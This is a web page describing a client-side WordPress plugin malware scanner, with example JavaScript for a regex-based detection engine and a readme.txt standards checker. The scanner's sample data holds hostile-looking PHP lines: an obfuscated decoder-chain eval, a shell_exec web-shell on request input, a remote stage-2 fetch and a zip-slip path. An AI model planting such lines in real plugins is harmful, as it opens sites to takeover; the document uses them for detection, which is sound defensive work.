Plugin Vulnerability & Quality Checker
Advanced Static Code Analysis & Malware Scanner. Upload a plugin ZIP to analyze its codebase, check for hidden backdoors, and verify WordPress repository standards (readme.txt).
base64_decode() or eval() for valid reasons (e.g., complex frameworks or custom compilers). A "High Risk" flag means you should manually review the flagged snippet; it does not by itself prove that the plugin is malicious.
The Ultimate WordPress Plugin Vulnerability Checker & Malware Scanner
WordPress powers over 43% of the internet. With over 60,000 free plugins in the official repository and thousands of premium themes, vulnerable or malicious third-party code is the most common entry point for WordPress site compromises. Our Plugin Vulnerability Checker lets developers and site owners run static code analysis and WordPress coding-standards checks on a plugin before it ever reaches a live site. It flags known-bad patterns; it does not prove that a plugin is secure.
Why You Need to Scan WP Plugins
Many site owners make the mistake of downloading "nulled" (cracked) premium plugins from unofficial sources. These files are almost always injected with hidden backdoors, SEO spam links, or crypto-miners. Furthermore, even legitimate plugins from trusted developers can contain severe vulnerabilities like SQL Injections (SQLi), Cross-Site Scripting (XSS), or Remote Code Execution (RCE) flaws.
Scanning a plugin before uploading it to a live server is a basic security practice. If the tool finds a suspicious pattern it flags it immediately, so you can inspect or discard the file before it ever runs on your server.
How Our Sandboxed Static Analysis Works
Traditional malware scanners require you to upload your `.zip` file to a server. If that server is not properly isolated (a container or throwaway VM with a read-only filesystem) and the scanner ever executes or includes the uploaded code, the malware runs on the scanning server itself. An attacker who then breaks out of whatever isolation layer exists is performing what is properly called a sandbox escape.
We avoid that problem by doing the analysis in the browser. Our scanner uses JSZip entirely client-side: when you select a plugin ZIP, the file is read locally and never leaves your computer. JavaScript extracts the entries in memory, reads the raw text, and runs a fast Static Application Security Testing (SAST) pass over it. Because the PHP is never handed to a PHP interpreter, the plugin's code cannot execute. What does run on attacker-controlled input is the ZIP parser and the regex engine, so the residual risk is resource exhaustion (a zip bomb, or a file crafted to make a regex backtrack for a long time) that can hang the tab, not code execution.
Dangerous PHP Functions We Detect
Our heuristic engine scans every .php file inside the plugin ZIP for known malicious footprints. These include:
- eval() and assert(): These functions execute arbitrary strings as PHP code (assert() did so only on PHP versions before 8). While sometimes used legitimately, they are the primary mechanism for hiding malicious payloads.
- base64_decode() and gzinflate(): Hackers use these to obfuscate (scramble) their malicious code so standard antivirus scanners can't read it. Seeing these combined with eval() is a massive red flag.
- shell_exec(), exec(), system(), and passthru(): These functions run commands on the underlying server operating system. A standard WordPress plugin rarely needs to run shell commands. Finding these usually indicates a severe backdoor or web shell.
- Remote Payloads: We scan for embedded external URLs (like raw GitHub gists or suspicious IP addresses) that the plugin might use to download stage-2 malware after installation.
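As an added example (not the checker's own source), here is a heuristic engine of the kind the list above describes, written in JavaScript so it could run client-side in the same way. It takes a plain object mapping ZIP entry path to file text, which is what JSZip's loadAsync() followed by file.async("string") produces; the sample plugin, the rule set, the severity assignments and the zip-slip check on entry names are all constructions for illustration. It also shows the false-positive guard a practitioner wants first: a negative lookbehind so that a PDO call such as $pdo->exec( is not reported as command execution.

```javascript
// Added example, not the checker's own code: a regex heuristic engine of the
// kind described above, run over an in-memory map of ZIP entry path -> text.
// In the browser that map is what JSZip's loadAsync() and file.async("string")
// produce; here the plugin is a constructed sample so the block runs offline.

const SEVERITY_RANK = { Safe: 0, Low: 1, Medium: 2, High: 3, Critical: 4 };

// Negative lookbehind so that $pdo->exec(, Foo::exec( or pdo_exec( do not
// trigger the command-execution rule (the most common false positive).
const CALL = "(?<![\\w$>:])";

// Ordered from most to least severe; overlapping lower-severity matches are
// suppressed so eval(gzinflate(base64_decode(...))) is reported once.
const RULES = [
  { id: "obfuscated-eval", severity: "Critical",
    re: new RegExp(CALL + "eval\\s*\\((?:\\s*(?:base64_decode|gzinflate)\\s*\\()+", "g"),
    why: "eval() fed by a decoder chain, the classic hidden payload" },
  { id: "dangerous-exec", severity: "High",
    re: new RegExp(CALL + "(?:shell_exec|exec|system|passthru)\\s*\\(", "g"),
    why: "runs operating-system commands; rarely needed by a plugin" },
  { id: "dynamic-eval", severity: "High",
    re: new RegExp(CALL + "(?:eval|assert)\\s*\\(", "g"),
    why: "executes a string as PHP code" },
  { id: "remote-payload", severity: "Medium",
    re: /https?:\/\/(?:raw\.githubusercontent\.com|gist\.githubusercontent\.com|\d{1,3}(?:\.\d{1,3}){3})[^\s'"]*/g,
    why: "hard-coded raw-host or bare-IP URL, possible stage-2 download" },
  { id: "base64-decode", severity: "Medium",
    re: new RegExp(CALL + "(?:base64_decode|gzinflate)\\s*\\(", "g"),
    why: "decoder present; legitimate in some APIs, review the context" },
];

// Zip-slip: an entry name that would escape the extraction directory.
const TRAVERSAL = /(^|[\\/])\.\.(?=[\\/]|$)|^[\\/]|^[A-Za-z]:/;

const lineOf = (src, idx) => src.slice(0, idx).split("\n").length;
function lineText(src, idx) {
  const start = src.lastIndexOf("\n", idx - 1) + 1;
  const end = src.indexOf("\n", idx);
  return src.slice(start, end === -1 ? src.length : end).trim().slice(0, 120);
}

function scanPhpSource(path, src) {
  const findings = [];
  const taken = []; // [start, end) ranges already reported in this file
  for (const rule of RULES) {
    rule.re.lastIndex = 0;
    let m;
    while ((m = rule.re.exec(src)) !== null) {
      const start = m.index;
      if (taken.some(([s, e]) => start >= s && start < e)) continue;
      taken.push([start, start + m[0].length]);
      findings.push({ severity: rule.severity, file: path, rule: rule.id,
        line: lineOf(src, start), snippet: lineText(src, start), why: rule.why });
    }
  }
  return findings;
}

function scanPlugin(files) {
  const findings = [];
  let hasReadme = false, phpFilesScanned = 0;
  for (const [path, content] of Object.entries(files)) {
    if (TRAVERSAL.test(path)) {
      findings.push({ severity: "High", file: path, rule: "path-traversal", line: 0,
        snippet: path, why: "entry name escapes the extraction directory (zip-slip)" });
    }
    if (/(^|\/)readme\.txt$/i.test(path)) hasReadme = true;
    if (/\.php$/i.test(path)) { phpFilesScanned++; findings.push(...scanPhpSource(path, content)); }
  }
  if (!hasReadme) {
    findings.push({ severity: "Low", file: "(plugin root)", rule: "missing-readme", line: 0,
      snippet: "", why: "no readme.txt; required by the WordPress.org repository" });
  }
  findings.sort((a, b) => SEVERITY_RANK[b.severity] - SEVERITY_RANK[a.severity]);
  return { riskLevel: findings.length ? findings[0].severity : "Safe",
    totalFiles: Object.keys(files).length, phpFilesScanned, findings };
}

// Constructed sample plugin (not a real package): one obfuscated eval, one
// web-shell style exec, one remote payload URL, one PDO ->exec( that must NOT
// fire, one benign base64_decode, and a zip-slip entry name.
const SAMPLE_PLUGIN = {
  "evil-plugin/evil-plugin.php":
    "<?php\n/*\nPlugin Name: Evil Plugin\nVersion: 1.0.0\n*/\n" +
    "eval(gzinflate(base64_decode('SGVsbG8=')));\n",
  "evil-plugin/includes/tools.php":
    "<?php\n$out = shell_exec($_GET['cmd']);\n" +
    "$stage2 = file_get_contents('https://raw.githubusercontent.com/x/y/main/p.txt');\n",
  "evil-plugin/includes/db.php":
    "<?php\n$pdo->exec('CREATE TABLE IF NOT EXISTS t (id INT)');\n" +
    "$cfg = json_decode(base64_decode($opts['blob']), true);\n",
  "../../wp-config.php": "<?php // zip-slip: would be written outside the plugin directory\n",
};

console.log(JSON.stringify(scanPlugin(SAMPLE_PLUGIN), null, 2));
```

Running it reports the sample as Critical with six findings: the decoder-chain eval on line 6 of the main file, shell_exec() on user input, the raw GitHub URL, the benign base64_decode() as Medium for review, the traversal entry name, and the missing readme.txt; the PDO exec() call is correctly ignored. The range de-duplication matters in practice: without it the same eval line would be reported three times and inflate the finding count.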
Checking WordPress Repository Standards (readme.txt)
In addition to malware scanning, our tool acts as a Plugin Quality Checker. Every plugin submitted to the official WordPress repository must contain a properly formatted readme.txt file. Our parser reads this file to extract critical metadata:
- Stable Tag: Verifies if the plugin is properly versioned.
- Requires at least: Ensures the plugin explicitly states the minimum WordPress core version needed to run, preventing fatal errors on outdated sites.
- Tested up to: An outdated "Tested up to" tag usually means the plugin is abandoned and may lack modern security patches.
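As an added example (again not the tool's own code), here is a parser for the readme.txt fields listed above together with the plugin header that WordPress itself reads from the main PHP file, so the Stable tag can be cross-checked against the header Version. The sample files, the staleness threshold CURRENT_WP_MAJOR and the exact issue strings are constructions for illustration; the 8 KiB header window and the "=== Name ===" / "== Section ==" readme layout are WordPress conventions.

```javascript
// Added example, not the checker's own code: the readme.txt and plugin-header
// checks described above, over an in-memory map of ZIP entry path -> text.

// Assumption for the staleness check: a "Tested up to" major version below this
// is reported as stale. Adjust as WordPress releases new majors.
const CURRENT_WP_MAJOR = 6;

// WordPress reads "Key: value" pairs from the first 8 KiB of the main plugin
// file, inside a comment block, so allow leading comment punctuation.
function parsePluginHeader(phpSource) {
  const head = phpSource.slice(0, 8192);
  const get = (key) => {
    const m = head.match(new RegExp("^[ \\t/*#@]*" + key + ":(.*)$", "mi"));
    return m ? m[1].trim() : "";
  };
  return { name: get("Plugin Name"), version: get("Version") };
}

// readme.txt: "=== Name ===" title, "Key: value" fields until the first
// "== Section ==" heading, then sections such as "== Changelog ==".
function parseReadme(text) {
  if (typeof text !== "string") return { present: false };
  const header = text.split(/^==\s/m)[0];
  const field = (key) => {
    const m = header.match(new RegExp("^" + key + "\\s*:\\s*(.+)$", "mi"));
    return m ? m[1].trim() : "";
  };
  const title = text.match(/^===\s*(.+?)\s*===\s*$/m);
  return {
    present: true,
    name: title ? title[1] : "",
    stableTag: field("Stable tag"),
    requiresAtLeast: field("Requires at least"),
    testedUpTo: field("Tested up to"),
    hasChangelog: /^==\s*Changelog\s*==\s*$/mi.test(text),
  };
}

function checkReadmeStandards(files) {
  const entries = Object.entries(files);
  const readmeEntry = entries.find(([p]) => /(^|\/)readme\.txt$/i.test(p));
  // The main plugin file is the PHP file whose header carries "Plugin Name:".
  const mainEntry = entries.find(([p, c]) => /\.php$/i.test(p) && parsePluginHeader(c).name);
  const meta = mainEntry ? parsePluginHeader(mainEntry[1]) : { name: "", version: "" };
  const readme = parseReadme(readmeEntry ? readmeEntry[1] : undefined);
  const issues = [];
  if (!mainEntry) issues.push("no PHP file with a 'Plugin Name:' header");
  if (!readme.present) { issues.push("readme.txt is missing"); return { meta, readme, issues }; }
  if (!readme.stableTag) issues.push("Stable tag: Missing");
  else if (meta.version && readme.stableTag !== meta.version)
    issues.push(`Stable tag ${readme.stableTag} does not match plugin header Version ${meta.version}`);
  if (!readme.requiresAtLeast) issues.push("Requires at least: Missing");
  if (!readme.testedUpTo) issues.push("Tested up to: Missing");
  else if (parseInt(readme.testedUpTo, 10) < CURRENT_WP_MAJOR)
    issues.push(`Tested up to ${readme.testedUpTo} is older than WordPress ${CURRENT_WP_MAJOR}.x; plugin may be abandoned`);
  if (!readme.hasChangelog) issues.push("no == Changelog == section");
  return { meta, readme, issues };
}

// Constructed sample: header Version and Stable tag disagree, "Tested up to"
// is stale, and there is no changelog section.
const SAMPLE_FILES = {
  "demo-plugin/demo-plugin.php":
    "<?php\n/**\n * Plugin Name: Demo Plugin\n * Version: 1.1.0\n */\n",
  "demo-plugin/readme.txt":
    "=== Demo Plugin ===\nContributors: someone\nTags: demo\nRequires at least: 5.0\n" +
    "Tested up to: 5.8\nStable tag: 1.0.0\nLicense: GPLv2 or later\n\n" +
    "== Description ==\nA constructed readme used only for this example.\n",
};

console.log(JSON.stringify(checkReadmeStandards(SAMPLE_FILES), null, 2));
```

The Stable tag versus Version comparison is the check worth keeping even if you drop the rest: WordPress.org serves the release named by Stable tag, so a mismatch means users may get a different build than the one the developer tested.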
Understanding Risk Levels & False Positives
After a scan, our engine assigns a risk level. Remember that false positives are possible: static analysis here means regex patterns matched against raw source text, including comments and string literals, so a legitimate developer using base64_decode() for an API integration will be flagged. The reverse also holds: a function name assembled at runtime (string concatenation, variable functions) does not match a regex, so a clean result is not proof of absence. Always review flagged code manually:
- Safe: No suspicious patterns found. (Note: static analysis cannot catch everything. Always use plugins from trusted sources.)
- Low / Quality Issue: Usually means the plugin is missing a readme.txt file or has formatting errors.
- Medium / Warning: Found base64 encoding or file system modifications. Might be legitimate, but warrants manual review.
- High: Dangerous execution functions (exec, system) detected. Do not use unless you wrote the code yourself.
- Critical: Confirmed backdoor signatures or obfuscated eval payloads. Delete the file immediately.
PluginLib